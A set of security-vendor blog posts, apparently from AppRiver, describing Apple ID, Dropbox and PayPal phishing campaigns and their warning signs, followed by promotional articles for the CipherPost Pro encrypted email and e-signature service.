Many phishing campaigns come and go in our line of work, but one type campaign that we can always guarantee to see are ones involving the tech giant Apple.

This week, we’ve seen an uptick of phishing emails aimed at Apple ID users. Some of the variants spotted informs the recipient that his Apple ID has been locked or limited for security purposes and he must login to Apple’s website with their credentials to lift the restriction. A link is provided within the email for the user.


During my investigation, I accessed the provided link within a secure environment and was presented with the screen as seen in the screenshot above. You can tell that a lot of effort went into providing the user with a somewhat legitimate-looking webpage reminiscent of Apple’s own website, however a few things stand out. For one, none of the buttons or links were clickable on the page. They were only static images to fool the user. Also not shown in the screenshot is the background image of the website, likely due to a static pixel size. On a high-resolution monitor, it can cause the image to repeat itself.


After entering in fake credentials, I proceeded to the next phase of this scam which led me to a page asking for additional personal information like date of birth, billing address etc. (I got a bit creative on this step). Again, extreme detail went into replicating the webpage to Apple’s aesthetic standards and would prove very difficult for many to identify visually as a fake. After clicking the “Verify” button, I was then directed to a page requesting credit card information. Interestingly enough, the form only allowed for either Visa or MasterCard inputs. I clearly wasn’t going to put my own credit card information into the fields, so when the form validation within the website code didn’t accept a fake entry, the investigation stopped there. I imagine that past this screen the user would be directed to Apple’s main website or be presented with a 404 error page.


As time goes on, the spammers will evolve their tactics and approaches to this campaign. AppRiver will continue to monitor live samples of this phishing campaign and continue blocking new variants as they are released into the wild. As always, AppRiver’s SecureTide spam and malware protection protects our customers from dangerous emails like these and many others like it.

Over the past few months our team has seen a rise of Dropbox-related phishing emails directed at customers under the guise of receiving an important document sent by a colleague or other entity. The emails seem to have a common pattern of informing the recipient that they must click on the link provided within the email in order to retrieve the document. Besides the ‘without frills’ visuals and language of the email, other clues that expose the phishing scam are the provided links. Hovering over the hyperlink will reveal that the website the email is attempting to direct users to is not

I’ve seen several variants of this campaign and they all have common elements but many things such as the URL, Subject, From address and text all vary. To further investigate how this campaign works, I tried visiting some of the links within the email and AppRiver’s SecureSurf web protection engine proactively blocked 3 of the links I attempted to launch (this is great news for admins who might be concerned about users being tricked into launching these links and falling victim to this scam). One of the newer emails had a link that I was able to visit without issue. The link directs the user to a website that attempts to impersonate Dropbox and instructs the user to login using their email credentials in order to access the document as seen below.




I typed in a fake email address and password and clicked on the button provided. From there the website brought me to a secondary page where it requested that I either provide a recovery phone number or email address to proceed further. No doubt this is to trick the user to providing their account recovery options so the scammers can then reset their email password without issue and thus have full access to the user’s mailbox. Once again I provided fake information and proceeded to the next page. Once this happened, I was redirected to’s website where I got to see some amazing but not so cheap apartments in Miami for rent.


As with all emails, if something seems off or weird in nature, proceed with caution. If you are an IT Administrator, security awareness is one of the best defenses against phishing emails like these. Combine that with the robust email and web protection services that AppRiver has to offer and you’ll have a good defense-in-depth strategy for your organization.

Over the past few years, we have seen explosive growth in malware and targeted spear phishing attacks being distributed via email. While those threats have necessarily garnered a lot of attention, it’s important to stay aware that other more historically common attacks are also quite persistent and still pose a significant threat to consumers and businesses.


One phishing attack that we have been monitoring this week utilizes a cast net style (one size fits all) approach in its effort to steal sensitive personal and financial data– all under the guise of a PayPal security message. These phishing messages rely on the ever popular fake security notice approach in an attempt to trick users into disclosing their personal information such as name, address, mother’s maiden name, social security number and credit card info.  The attackers’ method for extracting this information from the recipient is through the inclusion of an HTML attachment posing as an official account verification page belonging to PayPal. Because an HTML attachment, when clicked, opens in your browser—the victim may even believe they are on the actual PayPal website.

Here’s a look at the message and the attached phishing page:



Though most users are not accustomed to receiving HTML attachments, many may not realize how unusual it would be for a real company like PayPal to actually request a security verification in this manner. In fact, any real business (like PayPal) would almost certainly simply request that you navigate to PayPal on your own and verify things after logging in normally. If you ever find yourself on the receiving end of an email similar to this especially if it is asking you to provide any personal information, ALWAYS go directly to the site by typing it in your browser directly and not by following links of attachments within the email itself. As always, our customers are protected from these messages.

Whether you’re a lender, title company, attorney, or realtor, if you’re in the real estate market, you know the scrimmage of getting all parties to sign the appropriate documents on time in a secure manner. Many markets, including the real estate market, have turned to electronic signature solutions to ensure that important documents are signed in a timely, secure manner.

The demand for e-signature solutions, coupled with the need for robust email encryption that protects nonpublic information (NPI), is one reason why AppRiver added a new electronic signature solution to its CipherPost Pro™ email encryption platform, which already includes secure messaging, file sharing, email tracking, and document e-signatures on a monthly subscription.


How e-Signatures and Encrypted Email Work

Many people mistakenly believe that since standard email does not physically change hands, it is more secure that standard mail. However, it is arguably less secure than a post card traveling from Tahiti to New York, with every postal worker (network servers) whose post office it passes through along the way having eyes on it. Heaven forbid it ends up in the wrong recipient’s mailbox (inbox).

Unlike standard email, encrypted email and secure e-signature solutions don’t pass from server to server or even inbox to inbox. Instead, they live on one server within the cloud. When users need to e-sign documents or read encrypted email, they are taken to the secure server to view and sign the document in question, rather than the documents or emails being brought to their inboxes. Since the email or document in question only exists on one server, the sender has the capability of recalling the message, should it inadvertently end up in the wrong inbox.

With secure e-signatures, signatories sign documents by clicking on the attachment in their email, typing their name into the e-signature certificate field, and clicking to acknowledge their signature.  All of this occurs right within their email client. In addition, CipherPost Pro automatically tracks documents and alerts the sender when documents are signed via desktop and mobile alert notifications.


Secure e-Signatures and Email Encryption: The Dynamic Duo

Unlike many stand-alone e-signature solutions that require users to login to the secure platform in their browsers, this new secure e-signature offering is unique in that it integrates directly into Microsoft Outlook, Microsoft Office 365 and other Web-based email clients, meaning no additional steps must be taken to e-sign a document.

Additionally, it provides an alternative to costly and inefficient signing and transmission of paper documents with a simple “click-to-acknowledge” way to e-sign documents right in email.

CipherPost Pro’s new e-signature solution keeps documents encrypted and secure from the sender’s inbox to the signatory’s, even when stored. Whether a lawyer, realtor, or lender, from complex housing agreements needing multiple signatures to mortgage loan documents, all documents can be signed within seconds from a user’s inbox.

In addition to helping businesses remain compliant with Dodd-Frank, TILA-RESPA, HIPAA, and other regulations on how NPI is transmitted, AppRiver’s cloud-based e-signature solution helps customers improve productivity and lower costs, including costly courier, fax or email/print/scan scenarios. It gives users a convenient, fast way to e-sign and exchange various types and sizes of electronic documents and protects documents and sensitive or regulated data.

Additional Features at No Additional Cost

  • Maximum security.  Encrypt and protect documents in one click. Files are fully secured and signed documents are stored encrypted.
  • User authentication.  Every user is authenticated before e-signing and sending a document.
  • E-signature non-repudiation.  Full authentication, tracking and e-signing data is appended to the document.
  • Real-time activity alerts.  Users receive automatic notifications of e-signatures and message activity.
  • Selectable data residency.  Choose a data center location for documents and emails for regulatory compliance.
  • Support for large files and various file types.  Validate sizable documents such as complex PDFs as well as other file types, including x-rays, without size limitations.
  • Contributed to original sender.  Emails to signatories originate from the sender’s name, eliminating confusion about who owns and sent the information.
  • Mobile functionality.  Messages can be sent, signed and tracked through mobile apps for iOS, Android, Windows 10 and Blackberry 10.

The subscription price for a CipherPost Messaging Pro Account, which includes secure e-signatures, in addition to enterprise-level security, tracking, and control for sharing messages, large files, and information workflows, is $7.95 per month per user and free for guest users.

To find out more about AppRiver, CipherPost Pro and its other solutions visit

Lawyers instinctively understand that they have a responsibility to protect the confidentiality and privacy of their client’s information.  And, for good reason.  Our free whitepaper on email security in law firms, explains what you need to know and how you can use secure email to win more clients.

CPP LinkedIn

Law firms are increasingly attractive targets for hackers because they can access a treasure trove of client data, intellectual property and pending deals.

In today’s environment, organizations in every industry must have a security program in place that meets relevant legal standards and accepted best practices.  But to be fair, one can almost understand why law firms have been slow to adopt legacy encryption solutions.  Historically, encryption has had a reputation for being difficult to use and deploy.

Thankfully, secure email services have evolved in many ways:

  • It’s more than just email encryptionAppRiver’s CipherPost Pro™ protects and impacts much more than email.  It encompasses secure mobile and tablet messaging, secure large file transfer, policy-based encryption, secure web form and automated delivery of secure e-statements.  It’s an integrated strategy for secure communication from any device and any location that replaces a disjointed set of ad-hoc tools that are riddled with security gaps.
  • Multi-layered security. AES-256 encryption is only the starting point. Organizations need greater control over messages and attachments, and most importantly, tools to remediate inevitable user error. CipherPost Pro can provide additional controls such as preventing messages from being forwarded or replied to, password protection of the message and attachments, message recall even after a message has been read, and content filtering to stop mistakes before they happen.
  • Productivity and security. CipherPost Pro can help bring tremendous value by accelerating processes. Real-time tracking enables staff and clients to know exactly when any action has been taken on a message and advance workflows. Being able to send an encrypted large file with a secure message reduces the need to use inefficient mail and courier services. You and your clients will be able to send secure messages from the office, at home using Gmail or, at the airport on an unsecure network or while on the move via a mobile or tablet. Workflows never have to slow down because of security, which means that you ultimately deliver faster for your clients.
  • Client communication. One of the most interesting ways that CipherPost Pro has evolved is that it has the potential to improve how you communicate with clients. Real-time tracking of messages activity gives clients unique transparency so they always know what’s happening in a workflow. You can give your clients large file transfer capability, so they can easily bypass frustrating corporate email size restrictions. You can also give clients access to the same email plugins, mobile apps, browser extensions and desktop clients that internal employees can use. Gone are the days when clients have to be driven to an external portal to read and reply to a message. They can have a secure message decrypted right into their customary inbox or mobile device, which makes CipherPost Pro as easy and familiar as traditional email.
  • eDiscovery and Archiving.  Legacy solutions have struggled to archive encrypted data and also typically force organizations to create separate mail stores. These limitations have left organizations woefully unprepared for eDiscovery and at risk for compliance fines due to improper record retention. CipherPost Pro can create a single mail store as well as automatically decrypt messages into any archiving solution so that organizations can properly retain and retrieve secure messages in the event of litigation or an audit.
  • In the cloud. Cloud-based solutions have become the defacto deployment model for email encryption because the large majority of organizations prefer a faster, easier deployment with no hardware infrastructure that interferes with their current network architecture. Cloud deployments also do not strain limited IT resources and are much easier to scale and upgrade in multiple global data jurisdictions. Organizations in heavily regulated industries such as healthcare and financial services are turning to cloud-based email encryption because of the value compared to on-premise solutions.

While email encryption will soon be required by all of your existing and potential new clients, keep in mind that not all email encryption is the same. There are vast differences in functionality and end user experience that impact clients.

Using a solution like CipherPost Pro that has a unique array of patented features enables firms to differentiate themselves as a potential legal partner.  What’s more, the ability to brand the solution for each firm and attorney creates unique business development opportunities as clients see with each message that you value their privacy.

It’s email encryption that’s easy, more secure, more flexible and more transparent for clients that ultimately accelerates the completion of projects.

To learn more, please visit our website.

Or start your free 30-day trial now.